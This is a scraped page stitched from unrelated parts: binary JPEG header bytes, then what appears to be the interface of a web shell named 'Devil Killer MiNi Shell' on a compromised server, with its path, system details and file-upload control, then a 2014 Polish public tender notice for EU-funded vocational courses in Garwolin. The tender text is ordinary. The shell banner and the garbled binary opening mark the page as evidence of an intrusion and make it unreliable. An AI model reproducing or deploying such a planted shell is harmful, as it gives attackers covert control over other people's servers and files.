JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140807/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140807/264118-N-2014.html

<p class="kh_header"><b>Garwolin: Zorganizowanie i przeprowadzenie kursów - projekt realizowany w ramach Programu Operacyjnego Kapitał Ludzki i współfinansowany z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego: Aktywizacja, Aktywność, Praca- razem pokonamy bariery.</b><br>
<b>Numer ogłoszenia: 264118 - 2014; data zamieszczenia: 07.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Sportowa 5, 08-400 Garwolin, woj. mazowieckie, tel. 25 682 43 19, faks 25 682 43 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcprgarwolin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów - projekt realizowany w ramach Programu Operacyjnego Kapitał Ludzki i współfinansowany z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego: Aktywizacja, Aktywność, Praca- razem pokonamy bariery..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A.Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu i przeprowadzeniu następujących kursów:
1.Kurs komputerowy
2.Kurs językowy
3.Kurs prawa jazdy
4.Kurs operatora wózków jezdniowych z bezpieczną wymianą butli gazowej
5.Kurs barmański
6.Kurs obsługi kas fiskalnych z komputerowym systemem sprzedaży
7.Kurs operator koparko-ładowarki dla 3 osób niepełnosprawnych
8.Kurs florystyczny
9.Kurs wizażu z elementami stylizacji paznokci dla 3 osób

B.Szczegółowy opis przedmiotu zamówienia znajduje się w poszczególnych częściach ogłoszenia oraz w SIWZ.
C.Postanowienia dotyczące wszystkich zadań /od 1 do 9/
1.Wykonawca ubezpiecza uczestników/uczestniczki na czas trwania kursu od następstw nieszczęśliwych wypadków w trakcie kursu oraz w drodze na kurs i z kursu. 
2. Program kursu Wykonawca przedkłada, w dniu podpisania umowy. Kurs musi zawierać wszelkie elementy wymienione w § 75 ust. 4 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r w sprawie standardów i warunków prowadzenia usług rynku pracy /Dz.U. z 2010r Nr 177 poz. 1193 z późn. zm./ tj.:
a/nazwę i zakres szkolenia,
b/czas trwania i sposób organizacji szkolenia,
c/wymagania wstępne dla uczestników szkolenia,
d/cele szkolenia,
e/plan nauczania, określający tematy zajęć edukacyjnych oraz ich wymiar 
z uwzględnieniem części teoretycznej i części praktycznej,
f/opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
g/wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
h/przewidziane sprawdziany i egzaminy.
3.Zamawiający dopuszcza możliwość dołączenia uczestników/uczestniczek kursu/kursów będących przedmiotem zamówienia do innych grup realizujących tożsame kursy prowadzone przez Wykonawcę.
4.Zamawiający podał minimalny zakres programowy wskazując tym samym na zagadnienia, które muszą zostać podjęte podczas kursów. Wykonawcy mogą przedstawić autorskie programy kursów, zawierające niezbędne minimum, rozszerzając dowolnie zakres poszczególnych zagadnień oraz oddając własne moduły tematyczne.
5.Po wyborze najkorzystniejszej oferty Wykonawca, którego oferta została uznana za najkorzystniejszą w porozumieniu z Zamawiającym przedkłada harmonogram realizacji zadania.
6.Wykonawca poinformuje uczestników/uczestniczki kursu o finansowaniu zadania przez Europejski Fundusz Społeczny w ramach Programu Operacyjnego Kapitał Ludzki realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Garwolinie Aktywizacja, Aktywność, Praca- razem pokonamy bariery.Priorytet VII Działanie 7.1 Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.
7.Wykonawca zobowiązuje się do oznaczenia sal wykładowych, z których będą korzystać uczestnicy kursu poprzez umieszczenie informacji dotyczących projektu, którego część stanowi przedmiotowe zamówienie oraz współfinansowania przez Unię Europejską /oznaczenia dostarczone przez Zamawiającego/.
8.Wykonawca zobowiązuje się do archiwizacji wszystkich dokumentów związanych z   realizowanym projektem do 31 grudnia 2020 r.
9.Sporządzenia i wydania Zamawiającemu kserokopii/duplikatu zaświadczeń o ukończeniu kursu. Zaświadczenia mają być opatrzone w logotypy Programu Operacyjnego Kapitał Ludzki oraz logo Unii Europejskiej, logo Kapitał Ludzki-Narodowa Strategia Spójności i Powiatowe Centrum Pomocy Rodzinie w Garwolinie jako realizatora projektu oraz informacji: Kurs/szkolenie został zorganizowany w ramach projektu Aktywizacja, Aktywność, Praca-razem pokonamy bariery. współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie. W przypadku braku możliwości wydania logowanych zaświadczeń wykonawca zobowiązany jest wydać zaświadczenie i dodatkowo certyfikat o ukończeniu kursu/szkolenia opatrzonego w logotypy i informację, o których mowa powyżej. 
10.Wykonawca zobowiązuje się do bieżącego informowania Zamawiającego o przypadkach  nieobecności uczestników na zajęciach.
11.Przed podpisaniem umowy na wykonanie zadania Zamawiający i Wykonawca podpiszą umowę o powierzenie przetwarzania danych osobowych uczestników projektu.
12.Wykonawca pokryje koszty niezbędnych badań lekarskich, psychologicznych jeśli specyfika kursu/ szkolenia tego wymaga.
13.Uczestnikami kursów są osoby niepełnosprawne, wychowankowie rodzin zastępczych/placówek opiekuńczo-wychowawczych z terenu Powiatu Garwolińskiego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9, 80.53.32.00-1, 80.58.00.00-3, 80.41.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wskaże co najmniej 1 usługę należycie wykonaną w okresie ostatnich 3 lat /jeżeli okres prowadzenia jest krótszy - w tym okresie/ przed wszczęciem niniejszego postępowania /w przypadku świadczeń okresowych lub ciągłych również wykonywanych/. Wskazana usługa ma w swoim charakterze i złożoności odpowiadać obecnemu zamówieniu w zależności od zadania:
-w zakresie zadania nr 1 zrealizowanie grupowego szkolenia/kursu komputerowego.
-w zakresie zadania nr 2 - zrealizowanie szkolenia/kursu z języka angielskiego.
-w zakresie zadania nr 3 - zrealizowanie szkolenia/kursu prawa jazdy.
-w zakresie zadania nr 4 - zrealizowaniu szkolenia/kursu operatora wózków jezdniowych z bezpieczną wymianą butli gazowej.
-w zakresie zadania nr 5 - zrealizowaniu szkolenia/kursu barmańskiego.
-w zakresie zadania nr 6 - zrealizowanie szkolenia/kursu obsługi kas fiskalnych z komputerowym systemem sprzedaży.
-w zakresie zadania nr 7 - zrealizowanie szkolenia/kursu operatora koparko-ładowarki.
-w zakresie zadania nr 8 - zrealizowanie szkolenia/kursu florystycznego.
-w zakresie zadania nr 9 - zrealizowanie szkolenia/kursu wizażu z elementami stylizacji paznokci.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami posiadającymi minimum 3-letnie doświadczenie w prowadzeniu kursów /odpowiednio do zadania/.  
Zamawiający uzna warunek za spełniony, jeżeli wykonawca złoży wraz z ofertą oświadczenie w zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych załącznik nr 2 do SIWZ.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
Strony  przewidują możliwość wprowadzenia istotnych  zmian Umowy w zakresie: 
1/ zmiany miejsca kursu /sali szkoleniowej/, przy czym lokalizacja sali szkoleniowej nie może pozostawać w sprzeczności z wymaganiami Zamawiającego postawionymi w SIWZ, pod warunkiem, iż Zamawiający wyrazi zgodę na przedmiotową zmianę 
2/  zmiana wynagrodzenia Wykonawcy w przypadku rezygnacji w trakcie kursu osób skierowanych na kurs /z różnych przyczyn/.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcprgarwolin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Garwolinie ul. Sportowa 5. 08-400 Garwolin..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2014 godzina 09:30, miejsce: Powiatowe Centrum Pomocy Rodzinie ul. Sportowa 5,  08-400  Garwolin..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Programu Operacyjnego Kapitał Ludzki i współfinansowany z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego: Aktywizacja, Aktywność, Praca- razem pokonamy bariery..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs komputerowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 obejmuje kurs komputerowy dla 10 osób.
Ramowy program szkolenia: 
a.Budowa i zasady działania komputera.
b.Systemy operacyjne: Dos, Windows, tworzenie w nich zbiorów informacji i działania na nich.
c.Współpraca komputera z urządzeniami zewnętrznymi /skaner, drukarka, aparat cyfrowy, projektor LCD, kamera internetowa/.
d.Opracowywanie dokumentów tekstowo-graficznych w MS Word.
e.Praca z MS Exel: elementy programu Exel, skoroszyty, arkusze i komórki, wprowadzanie danych tekstowych, wprowadzanie danych liczbowych, autosuma, wprowadzanie i przeliczanie formuł, funkcje MS Equation.
f.Tworzenie baz danych w Access.
g.Wykorzystywanie Internetu jako narzędzia do poszukiwania pracy oraz tworzenie witryn internetowych.
Wymagania minimalne:
Minimalna liczba godzin - 80, 2 razy w tygodniu po 4-6 godzin dziennie /z wyłączeniem dni świątecznych/. Jedna godzina rozumiana jest jako 45 minut.
Zapewnione materiały dydaktyczne, niezbędne przybory i podręczniki /podręcznik tematyczny związany z kursem komputerowym, notes A4, długopis, pendrive min. 16 GB/.
Catering dla uczestników szkolenia /herbata, kawa, soki owocowe, woda mineralna w małych butelkach gazowana i niegazowana, ciastka, paluszki solone itp./ Dodatkowo wykonawca zobowiązany jest do zapewnienia jednego posiłku ciepłego każdorazowo dla uczestników kursu /w którego skład będzie wchodzić danie główne mięsne lub rybne, ziemniaki/ryż/frytki oraz zestaw surówek/. Posiłki nie mogą być podawane w sali szkoleniowej.
Zapewnienie podczas zajęć dla każdego uczestnika indywidualnego stanowiska komputerowego z dostępem do Internetu. /Uwaga: Zamawiający nie dopuszcza, aby podczas przeprowadzanego kursu przy jednym stanowisku komputerowym przebywało więcej niż jeden uczestnik/.   Sprzęt komputerowy musi spełniać wymogi BHP oraz musi być w bardzo dobrym stanie technicznym z oprogramowaniem gwarantującym odpowiedni poziom kursu dla każdego z uczestników. Sala wykładowa powinna być dostosowana do potrzeb osób niepełnosprawnych z łatwym dostępem do węzła sanitarnego. Sala powinna być wyposażona dodatkowo w sprzęt audiowizualny typu: projektor, laptop, ekran, tablica typu flipchart. Obiekt szkoleniowy musi znajdować się na terenie miasta Garwolin.
Wykonawca zobowiązany jest do sporządzenia i wydania Zamawiającemu zaświadczeń o ukończeniu kursu, które w swojej treści musi zawierać minimum niżej wymienione elementy, o ile przepisy odrębne nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie lub zaświadczenie zgodne z wzorem określonym w treści § 18 ust.2 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych dołączając do niego suplement zawierający: okres trwania szkolenia, tematy i wymiar godzin zajęć edukacyjnych, numer z rejestru zaświadczenia, do którego suplement  jest dodatkiem, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenia. Ponadto uczestnicy szkolenia po pozytywnym ukończeniu kursu muszą otrzymać także zaświadczenie/certyfikaty o ukończeniu kursu opieczętowane logotypami Programu Operacyjnego Kapitał Ludzki, Flagi Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz informacją o współfinansowaniu.
Wykonawca zobowiązany jest do prowadzenia niezbędnej dokumentacji zgodnie z zasadami promocji projektu, w tym:
-dziennik zajęć edukacyjnych, 
-harmonogram,
-listy obecności,
-lista potwierdzająca odbiór materiałów szkoleniowych, 
-lista potwierdzająca odbiór wydanych zaświadczeń,
-lista potwierdzająca odbiór cateringu, 
-xero polisy ubezpieczeniowej, 
-zdjęcia dokumentujące zajęcia, 
-sprawozdanie z przeprowadzonego kursu.
Dysponowanie najpóźniej na dzień podpisania umowy obiektem szkoleniowym znajdującym się na terenie miasta Garwolin wyposażonym w stanowiska komputerowe dla uczestników kursu komputerowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9, 80.53.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs językowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 obejmuje kurs języka angielskiego dla 11 osób.
Ramowy program szkolenia: Zajęcia przeprowadzane indywidualnie dla każdego uczestnika, dostosowane do poziomu wiedzy odbiorcy.
Wymagania minimalne: Zapewnione materiały dydaktyczne, niezbędne przybory i podręczniki /podręcznik tematyczny do nauki języka angielskiego, notes A4, długopis/
Catering dla uczestników szkolenia /herbata, kawa, soki owocowe, woda mineralna w małych butelkach gazowana i niegazowana, ciastka, paluszki solone itp/.
Sala wykładowa powinna być dostosowana do potrzeb osób niepełnosprawnych z łatwym dostępem do węzła sanitarnego. 
Wykonawca będzie dysponował najpóźniej na dzień podpisania umowy obiektem szkoleniowym znajdującym się na terenie miasta Garwolin wyposażonym w co najmniej 3 sale szkoleniowe dla przeprowadzenia indywidualnych lekcji języka angielskiego.
Wykonawca zobowiązany jest do sporządzenia i wydania Zamawiającemu zaświadczeń o ukończeniu kursu, które w swojej treści musi zawierać minimum niżej wymienione elementy, o ile przepisy odrębne nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie lub zaświadczenie zgodne z wzorem określonym w treści § 18 ust.2 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych dołączając do niego suplement zawierający: okres trwania szkolenia, tematy i wymiar godzin zajęć edukacyjnych, numer z rejestru zaświadczenia, do którego suplement  jest dodatkiem, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenia. Ponadto uczestnicy szkolenia po pozytywnym ukończeniu kursu muszą otrzymać także zaświadczenie/certyfikaty o ukończeniu kursu opieczętowane logotypami Programu Operacyjnego Kapitał Ludzki, Flagi Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz informacją o współfinansowaniu. Wykonawca zobowiązany jest do prowadzenia niezbędnej dokumentacji zgodnie z zasadami promocji projektu, w tym:
- dziennik zajęć edukacyjnych, 
- harmonogram,
- listy obecności,
-lista potwierdzająca odbiór materiałów szkoleniowych, 
- lista potwierdzająca odbiór wydanych zaświadczeń,
-lista potwierdzająca odbiór cateringu, 
-xero polisy ubezpieczeniowej, 
-zdjęcia dokumentujące zajęcia, 
-sprawozdanie z przeprowadzonego kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9, 80.58.00.00-3.</p></li>
